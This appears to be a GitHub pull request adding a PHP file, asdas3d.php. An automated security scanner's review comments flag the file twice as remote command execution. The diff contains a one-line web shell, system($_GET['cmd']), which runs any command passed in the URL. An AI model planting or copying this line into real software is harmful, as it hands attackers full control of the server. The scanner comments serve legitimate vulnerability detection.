Conversation
|
|
||
| echo "<h1>test</h1>"; | ||
|
|
||
| system($_GET["cmd"]); |
There was a problem hiding this comment.
Command Injection Vulnerability in asdas3d.php (Severity: HIGH)
Remote command execution is possible due to unsanitized user input. The application passes the value of the cmd parameter from the GET request directly to the system() function in asdas3d.php on line 7, which allows an attacker to execute arbitrary shell commands on the server. This can lead to complete system compromise.
View details in ZeroPath
|
❌ Possible security or compliance issues detected. Reviewed everything up to 0a0da94. The following issues were found:
Security Overview
Detected Code Changes
Reply to this PR with |
| echo "<h1>test</h1>"; | ||
|
|
||
| system($_GET["cmd"]); | ||
|
|
There was a problem hiding this comment.
Remote Command Execution in asdas3d.php via 'cmd' Parameter (Severity: CRITICAL)
This vulnerability allows attackers to execute arbitrary commands on the server, potentially leading to complete system compromise. The system() call in asdas3d.php (lines 8-8) directly uses the value of the cmd GET parameter without any sanitization. This allows an attacker to inject malicious commands into the system, resulting in unauthorized access and control.
View details in ZeroPath
|
❌ Possible security or compliance issues detected. Reviewed everything up to 0a0da94. The following issues were found:
Security Overview
Detected Code Changes
Reply to this PR with |
No description provided.